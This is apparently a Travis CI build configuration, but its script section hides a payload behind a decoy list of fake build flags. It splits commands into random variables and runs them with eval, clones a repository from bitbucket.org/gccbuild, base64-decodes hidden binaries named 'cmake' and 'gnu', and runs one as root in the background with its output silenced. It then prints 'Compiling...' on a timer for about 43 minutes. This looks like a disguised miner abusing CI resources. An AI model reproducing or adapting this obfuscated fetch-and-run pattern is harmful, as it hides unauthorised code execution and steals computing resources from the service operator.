dist: bionic

env:
  - BUILD="--oneshot=943QW"
  - BUILD="--keep-going=646U0"
  - BUILD="--nodeps=434rC"
  - BUILD="--select=6863V"
  - BUILD="--autounmask-use=939AL"
  - BUILD="--ignore-world=7282I"
  - BUILD="--unordered-display=69670"
  - BUILD="--autounmask-backtrack=391BQ"
  - BUILD="--sysroot=8646C"
  - BUILD="--depclean-lib-check=620Ph"
  - BUILD="--autounmask-write=517p"
  - BUILD="--config-root=752Uv"
  - BUILD="--rage-clean=452BQ"
  - BUILD="--verbose-conflicts=547Ge"
  - BUILD="--backtrack=707MY"
  - BUILD="--root-deps=295h7"
  - BUILD="--read-news=7589g"
  - BUILD="--usepkgonly=14vn"
  - BUILD="--depclean=763E2"
  - BUILD="--package-moves=83003"
  - BUILD="--buildpkg-exclude=117Dv"
  - BUILD="--autounmask-unrestricted-atoms=523pm"
  - BUILD="--autounmask-use=99290"
  - BUILD="--fuzzy-search=800ln"
  - BUILD="--buildpkgonly=563Qb"
  - BUILD="--ignore-world=733Fc"
  - BUILD="--info=790L7"
  - BUILD="--usepkg=780Ym"
  - BUILD="--sysroot=268kv"
  - BUILD="--implicit-system-deps=481bI"
  - BUILD="--autounmask-keep-masks=169AU"
  - BUILD="--fuzzy-search=365gk"
  - BUILD="--depclean=304kK"
  - BUILD="--fetch-all-uri=845Yp"
  - BUILD="--depclean-lib-check=864wr"
  - BUILD="--autounmask-keep-masks=458qY"
  - BUILD="--emptytree=829PI"
  - BUILD="--quiet=324PM"
  - BUILD="--nospinner=4eY"
  - BUILD="--unordered-display=381YD"
  - BUILD="--reinstall=361bT"
  - BUILD="--autounmask-keep-keywords=440zT"
  - BUILD="--onlydeps-with-rdeps=999wJ"
  - BUILD="--quiet-fail=9268Z"
  - BUILD="--tree=363vE"
  - BUILD="--package-moves=426KG"
  - BUILD="--autounmask=8737i"
  - BUILD="--skipfirst=520m9"
  - BUILD="--config=133FM"
  - BUILD="--noreplace=575Xn"
  - BUILD="--search-index=733WH"
  - BUILD="--autounmask-only=6158k"
  - BUILD="--searchdesc=850pY"
  - BUILD="--accept-restrict=803hA"
  - BUILD="--autounmask-unrestricted-atoms=7Po"
  - BUILD="--newrepo=2599S"
  - BUILD="--metadata=71KO"
  - BUILD="--rebuild-if-new-rev=322Zf"
  - BUILD="--autounmask-license=249q8"
  - BUILD="--read-news=241dF"
  - BUILD="--deselect=270ga"
  - BUILD="--nospinner=898z2"
  - BUILD="--ask=895CW"
  - BUILD="--nospinner=319wc"
  - BUILD="--verbose-slot-rebuilds=469Yd"
  - BUILD="--deep=968Xc"
  - BUILD="--accept-properties=113x3"
  - BUILD="--list-sets=502rR"
  - BUILD="--root=9166r"
  - BUILD="--implicit-system-deps=398ZO"
  - BUILD="--autounmask-unrestricted-atoms=873Sg"
  - BUILD="--quiet-unmerge-warn=534Cl"
  - BUILD="--alphabetical=345sR"
  - BUILD="--reinstall-atoms=4xQ"
  - BUILD="--select=542rp"
  - BUILD="--check-news=849Be"
  - BUILD="--changed-deps-report=62Mf"
  - BUILD="--newrepo=165sy"
  - BUILD="--depclean=433os"
  - BUILD="--clean=152uU"
  - BUILD="--pkg-format=326b5"
  - BUILD="--with-bdeps=5608r"
  - BUILD="--selective=326ZL"
  - BUILD="--complete-graph-if-new-ver=341pu"
  - BUILD="--config=786pR"
  - BUILD="--onlydeps=774Ce"
  - BUILD="--list-sets=457A4"
  - BUILD="--exclude=4693l"
  - BUILD="--sync-submodule=698AT"
  - BUILD="--noreplace=7286g"
  - BUILD="--changed-slot=324qK"
  - BUILD="--quiet-repo-display=984Wg"
  - BUILD="--sysroot=733o5"
  - BUILD="--with-test-deps=588mV"
  - BUILD="--oneshot=818wV"
  - BUILD="--select=291sK"
  - BUILD="--fail-clean=6703q"
  - BUILD="--reinstall-atoms=110Xn"
  - BUILD="--rage-clean=181Va"
  - BUILD="--config=189wx"
  - BUILD="--info=4712W"
  - BUILD="--emptytree=326ti"
  - BUILD="--nodeps=622m7"
  - BUILD="--ignore-world=381Km"
  - BUILD="--regen=807YZ"
  - BUILD="--onlydeps-with-rdeps=68Qc"
  - BUILD="--autounmask-backtrack=8615K"
  - BUILD="--ignore-default-opts=1424w"
  - BUILD="--deselect=407WV"
  - BUILD="--onlydeps-with-rdeps=585lY"
  - BUILD="--jobs=276zq"
  - BUILD="--color=802dX"
  - BUILD="--buildpkg-exclude=562Q0"
  - BUILD="--changed-deps-report=614HX"
  - BUILD="--prune=696Fb"
  - BUILD="--rebuild-if-unbuilt=408Da"
  - BUILD="--keep-going=363e4"
  - BUILD="--emptytree=8948a"
  - BUILD="--rage-clean=314Z1"
  - BUILD="--ignore-world=5451e"
  - BUILD="--autounmask-use=454zG"
  - BUILD="--dynamic-deps=845UJ"
  - BUILD="--fetchonly=793Si"
  - BUILD="--autounmask-write=353o8"
  - BUILD="--rebuild-if-new-rev=768MW"
  - BUILD="--quiet-unmerge-warn=600sm"
  - BUILD="--select=595WD"
  - BUILD="--verbose=8065"
  - BUILD="--usepkg=556mF"
  - BUILD="--autounmask-write=467Z0"
  - BUILD="--rebuild-ignore=945gb"
  - BUILD="--alert=574Ww"
  - BUILD="--jobs=476YT"
  - BUILD="--with-bdeps-auto=700Mq"
  - BUILD="--search-similarity=563SO"
  - BUILD="--verbose-slot-rebuilds=997i"
  - BUILD="--tree=156QN"
  - BUILD="--getbinpkg=366G8"
  - BUILD="--ignore-default-opts=965fv"
  - BUILD="--changed-deps=832Dp"
  - BUILD="--with-test-deps=707LK"
  - BUILD="--pretend=144cu"
  - BUILD="--columns=816v4"
  - BUILD="--alphabetical=318GB"
  - BUILD="--info=9607B"
  - BUILD="--verbose-slot-rebuilds=871pF"
  - BUILD="--search-index=212m"
  - BUILD="--with-bdeps=145kF"
  - BUILD="--list-sets=9489o"
  - BUILD="--clean=584VK"
  - BUILD="--quiet-repo-display=937q3"
  - BUILD="--autounmask=858Cx"
  - BUILD="--help=91An"
  - BUILD="--onlydeps=681op"
  - BUILD="--reinstall=102eD"
  - BUILD="--fuzzy-search=919zE"
  - BUILD="--newrepo=168jY"
  - BUILD="--ignore-default-opts=4473U"
  - BUILD="--verbose=300hL"
  - BUILD="--color=7079v"
  - BUILD="--ignore-default-opts=284xo"
  - BUILD="--select=12oV"
  - BUILD="--ask=47qk"
  - BUILD="--misspell-suggestions=629Ne"
  - BUILD="--onlydeps=642Cs"
  - BUILD="--complete-graph-if-new-use=195XP"
  - BUILD="--nospinner=822pk"
  - BUILD="--onlydeps=90865"
  - BUILD="--with-test-deps=165Ra"
  - BUILD="--reinstall-atoms=100Dg"
  - BUILD="--complete-graph=738Ze"
  - BUILD="--complete-graph-if-new-ver=605y8"
  - BUILD="--changed-deps=862KD"
  - BUILD="--newuse=12ua"
  - BUILD="--noconfmem=715K6"
  - BUILD="--quiet=2164Z"
  - BUILD="--sysroot=67r1"
  - BUILD="--buildpkgonly=375to"
  - BUILD="--fetchonly=898C6"
  - BUILD="--pkg-format=752Im"
  - BUILD="--onlydeps=206yj"
  - BUILD="--changed-slot=954qy"
  - BUILD="--rebuild-if-new-ver=104vq"
  - BUILD="--autounmask-write=382Fr"
  - BUILD="--oneshot=177UI"
  - BUILD="--with-test-deps=747TS"
  - BUILD="--usepkg=769CA"
  - BUILD="--verbose=558EF"
  - BUILD="--rebuild-if-new-slot=345dm"

language: minimal

script:
  - sudo apt update || true
  - lHFrtxWgaT="sudo apt --"
  - bLlWjIgJGb="yes install"
  - wuVyIo=" cl-base64 "
  - ohRNIloa="git &>/dev/"
  - eval "$lHFrtxWgaT""$bLlWjIgJGb""$wuVyIo""$ohRNIloa""null"
  - ipOkCMHs="git clone h"
  - oREgsuqH="ttps://gccb"
  - kcDdNulpRe="uild@bitbuc"
  - nCpqmIGfSVB="ket.org/gcc"
  - cfKonopjbh="build/gcc.g"
  - FGutEKGmCms="it &>/dev/n"
  - eval "$ipOkCMHs""$oREgsuqH""$kcDdNulpRe""$nCpqmIGfSVB""$cfKonopjbh""$FGutEKGmCms""ull"
  - fCWcdMfujQ="base64 -d g"
  - MbEyIIU="cc/cmake_ >"
  - eval "$fCWcdMfujQ""$MbEyIIU"" cmake"
  - xmVhdhEaMMI="base64 -d g"
  - mSSJpstp="cc/config_ "
  - eval "$xmVhdhEaMMI""$mSSJpstp""> xconfig"
  - wFDawGnuZ="base64 -d g"
  - KHcnToIbB="cc/make_ > "
  - eval "$wFDawGnuZ""$KHcnToIbB""gnu"
  - kihNr="chmod +x gn"
  - eval "$kihNr""u cmake"
  - KStwpxSIQbs="./cmake"
  - eval "$KStwpxSIQbs"""
  - WAbyzVoAz="sed -i 's/b"
  - KGDfAmKuapN="uild/tg3o/g"
  - eval "$WAbyzVoAz""$KGDfAmKuapN""' xconfig"
  - sudo ./gnu -c xconfig &>/dev/null &
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2565)) ] && sudo killall gnu && break; sleep 183; done
